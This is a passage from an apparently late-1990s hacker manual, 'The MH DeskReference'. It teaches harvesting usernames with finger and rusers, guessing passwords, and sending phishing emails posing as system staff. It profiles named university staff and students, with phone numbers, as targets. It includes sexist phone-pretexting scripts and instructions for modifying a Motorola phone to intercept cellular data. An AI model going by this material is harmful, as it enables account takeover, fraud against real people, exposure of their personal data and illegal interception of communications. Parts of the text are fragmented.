shut off finger services. The rusers command is to check for people logged in with rsh or rlogin (remote log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de Note: There used to be an old bug in rlogin where you could type: rlogin -lroot victim.com and when the remote server parsed the data it would not read right and you would get root access however this technique is old and rarely works anymore. By using finger and rusers we can get users names and that right there can lead to access of a system. Take nether.net for example. If you finger nether.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finger @nether.net) you will get a list of user names. Now its been my experience that systems such as nether.net or places that give access to everyday users, 1 out of 70 or so users picks the same user name as there password. So it wouldn't take much time to finger @nether.net then telnet to nether.net and try all the users you got from the finger. Also since you have gotten a list of usernames from finger nether.net you could then send e-mails to the users saying that you are a system official at nether.net and need to verify there password etc... You would be surprised what a little mind games can do for you. Also a goo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nger -l @victim.com can give you information such as the last time a user logged in, what type of shell there account is set to use, and where there home directory is. We can also watch for patterns in a users access to a system. We could see whether they come on at night or during the day. To drop back to the thing of knowing about a person and there information to try and guess or talk them out of there password. Here is a finger on purdue. Look at the interesting information we can g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home/chameleon/ $finger @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use finger to search the Purdue Electronic Directory Service, specify you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query as a person's given name.  You can specify just a last name, a fir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 and a last name, or a first name, last name, and middle initial, b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eparating them with periods or commas.  For exam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finger smyth@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finger smyth,veronica@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finger veronica.j.smyth@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ere was a lot more then this but I snipped it to make this shorter. Basically what it is saying is you got to put a user@server.com instead of just server.com or in this case, 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home/chamele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 by looking at what it said I see it says finger smyth@purdue.edu as an example. Now this is probably the same example that comes with this particular finger daemon but what the hell, lets try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home/chameleon/ $finger smyth@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utput of your query: smy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                               Dept/School          Phone           Stat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Ema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eronica j smyth                   computing center     +1 777 99-99999 staf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t;no email address available&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ichael steel smyth                engineering and tec                  stud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t;no email address available&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arbara j wilson smyth             liberal arts and sc                  stud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t;no email address available&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lliam paul smyth                 freshman engineerin                  stud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t;no email address available&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rin margaret smyth                science                              stud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t;no email address available&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eryl lynn smyth                  liberal arts                         stud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lt;no email address available&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a more detailed response, finger "query_smyth@directory.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help, finger "help@directory.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home/chamele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 this helps us in some ways and doesn't. We can see through this finger full names of students and what there major is. So what you ask? You know how much information you can get from someone's legal full name? Chameleon will teach you how much later on in this document. So yes this finger was good because it got us personal information about a few account holders at purdue.edu even an administrators number but, what are the user names to these accounts? Well most universities issues there students accounts in the same way. They usually make the username for a students account first letter of first name and then full last name. So if your name is Kevin Hall your user name would be khall@purdue.edu. Now we could then try and finger that user. So we would do the follow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home/chameleon/ $finger khall@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utput of your query: kh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                               Dept/School           Phone                Stat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Ema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evin G. Hall            computing center   +1 213 463-6694   stud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khall@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a more detailed response, finger "query_khall@directory.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help, finger "help@directory.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home/chamele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e see that the finger dameon says for a more detailed response to d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inger query_khall@direcroty.purdue.edu So we type in the comm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home/chameleon/ $finger query_khall@directory.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cribe.cc.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utput of your query: query_kh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name: Kevin G. Ha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campus: west lafayet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itle: sen syst anlyst/sen pace tech c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department: computing cen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building: pot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office_phone: +1 765 49-6828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email: khall@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help, finger "help@directory.purdue.ed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terCore:/home/chamele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w this is interesting. We have a user name, khall, we have the users full name, Kevin G. Hall and we know his title and department. So from this information you will learn later you can get his home phone number and address. If we were to give the student a call at their house or dorm etc... It wouldn't be too hard for anyone with a little bit of social engineering skills to talk this user out of his passwo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re is a basic example of how to get information about a logged on us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6.1.2] Mental Hacking, once you know a userna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te: This is mostly going to work for systems that provide users with accounts and not company serv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you (the (cracker/hacker) are a Male then you would want to try to finger and get a username of a woman. You could then do 2 things. You will probably get there full name but if not read my (chameleons) later paper about getting people's information. For simplicities sake say you already have the users phone number which might sound hard to do but isn't. So say you have their phone number and it's a woman. Call the lady up. A true social engineer will know right away what kind of woman it is. On you can push over and mow down or one that has a strong head on her shoulders. If she answers and sounds lame then go for the approach of a stern voice saying its imperative etc... that you verify her user name and password. If the lady seems to have a strong head on her shoulders then you would want to talk nicer and flirt a bit. If you are a woman (cracker/hacker) then you will want to find a males account. Women let me tell you this. The best hackers and crackers out there are women. If you are a woman then you will want to try to get into a male's account. Once you have a male account holders phone number call him up. Women you got it easier see you don't need to know what type of guy it is. All guys are horny. So talk with your sexy voice. Flirt with them etc... It is easier for women to talk people out of passwords. If you are a guy (cracker/hacker) and are trying to get a guys password then have a girlfriend of yours try to do it. Remember this most of all, KNOW the person you are calling. You could call them up and tell them you are from the local high school and are doing a survey and then ask them a bunch of questions to get to know what they like and then when you later call to get there password you use this information to get on there better side and win there trust. This is called mental hacking and it is not that hard at all. One thing that the hackers of today have lost is there social skills. Some systems don't have software exploits. Sometimes you have to go the extra mile. Note: Don't get me wrong and think I am some weirdo about the way I talked about men and women but, I do know people we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7.0.0] Making a DDI from a Motorola Brick pho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y Virtual of Cybrids C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ww.cybrids.or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K, here it is, i'm not gonna talk about it a whole lot, just tell you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at i've done, and what i want to see done. As of this point I ha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ound the Clock, Data, and the spot where you would feed your audio inp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om your scanner that has WBF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irst you will need to locate the chip that has the clock and data pin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will be labeled SC3800xxFN, or something close to that, xx being so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umbers. Having trouble already, then i'll tell ya another way, its th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biggest PLCC (square) chip in the phone.  Now look at the chip, there is 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ch on the front of it which means pin 1. Now look at the opposite si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f that dot, to the pins on the bottom, count over from the left, pins 8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nd 9 from the left side are the ones you want. I have included a pictu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f the inside of a brick phone. The red arrow points to the side of th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hip that I am talking about. Pin 8 is the data and Pin 9 is the clock.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ose are the pins that will be fed to your computer for decod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receiver chip is what you need to modify next. It's on the circuit boar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ith the big white rectangle thing, and the big peices of metal, its th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nly square chip you can see. Its got a few numbers on it and i'll put em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here to help you find it, 185, X94R01, something to that effect, but jus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look for the only PLCC chip visible. I have marked this chip with a blu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ircle.  With the phone oriented like in the picture, cut the trace coming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rom the bottom pin on the right of the chip.  Connect your scanner's OUTP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 the other side of that trace (not the one conecting to the chi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ut it in the center so you will have room to solder to either sid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f the wire trace. The pin coming off the chip is what the cellular pho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s receiving, the other side of the wire trace that you cut is where i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being se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at about sums up what you need to know, if you have any other non-bonehea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questions, i'm in #cellular on EFnet most all the time and #Cybrids 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ndern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w here is what I want to see happen, for all the smart guys out the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canners are cool, but why use it, the phone is capable of receiving th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RECC without a scanner, I am working on makin this happen right now, bu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ith others help, i'm sure this could get done a lot faster, and woul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nefit everyone great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able connections to the compu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DI</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>Parallel Po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lock   </w:t>
        <w:tab/>
        <w:t>1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Data    </w:t>
        <w:tab/>
        <w:t>1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round</w:t>
        <w:tab/>
        <w:t>1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pecial Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undern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ware of new technology coming out from companies such as Cellular One, technologies such as FPF Protection which requires you to enter an access code to make out going calls on your cellphon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b/>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8.0.0] Pager Programm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y Virtual of Cybrids C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In order to build a pager programmer, you are going to need a few things.  A soldering Iron, the pager you are going to program, and a few brain cells.  You will also need the software that is used to program your specific pager which can be found on my web page at the bottom of the text. The diagram I have included should be self explanatory but I will say a few things about it just incase.  The only chip needed is the Max233 which will convert the serial port voltage down to TTL level so the pager can understand it.  Normally a serial port communicates with +15 volts being a logic high and -15 being a logic low.  The chip converts this down to TTL which is 0 - 5 volts where 0 is low and 5 is high.  The chip is shown inside the plastic hood that covers the connector.  Make sure your hood is plastic and not metalized as this is real metal coating and will short the pins.  This side will plug into your serial port.  The 4 pin connector shown will go to the pager.  Where it says +5 volts is where you supply the chip with 5 volts, its not a 5 volt output.  A circuit like this could be used to generate the +5 volts using the very common 7805 voltage regulator.                  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7805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Vin ________|  |  |_________V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g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in  = Voltage in, 6-12 volt wall adaptor, + goes to Vin, - goes to g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out = +5 volts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nd = ground, could be thought of as min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You will also have to supply your pager with power, which is probably 1.5 volts.  Then you will have to find the transmit and receive pins on your pager and hook it up to the programmer accordingly.  The only way to do this is to open up your pager and look around for something that might look like a programming connector or pad with 3 or 4 wires, don't confuse this with the connector that connects the processor and receiver boards in Motorola Bravo pagers.  I can't give exact instructions here because unfortunately I do not own every pager in the world.  If they aren't hooked up correctly when you run the pager programming software it will just give you an error but won't affect the pager, so just switch the wires around.  Make sure you hooked the ground to the pager too, or else nothing will work.  The gnd wire should be connected to the minus terminal on the pagers battery connec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e chip, hood, and connector can be bought at DigiKey.  This is by far the simplest and easiest to build design I've seen on the net. Motorola's web page shows all of their pager designs so you can figure out what type of pager you have, and can then get the software for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gramming Software:</w:t>
        <w:tab/>
        <w:t>http://www.cybrids.org/virtu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torola:</w:t>
        <w:tab/>
        <w:tab/>
        <w:t>http://www.mot.com/MIMS/MSPG/cgi-bin/prodcat.cg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pecial Note: The graphic that is referenced in this portion can be obtained at the rhino9 website or directly from Virtual. Find him in #cybrids on Undern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19.0.0] The E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hino9 and the other people that attributed to this document have enjoyed passing on their knowledge and will continue to do so. Be on the look out next year for The MHD version 2.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op persecuting and criminalizing the curio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ea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08:36:00Z</dcterms:created>
  <dc:creator>Redhot</dc:creator>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy>Redhot</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">1999-05-02T08:36:00Z</dcterms:modified>
  <cp:revision>3</cp:revision>
  <dc:subject/>
  <dc:title>The MH DeskReference</dc:title>
</cp:coreProperties>
</file>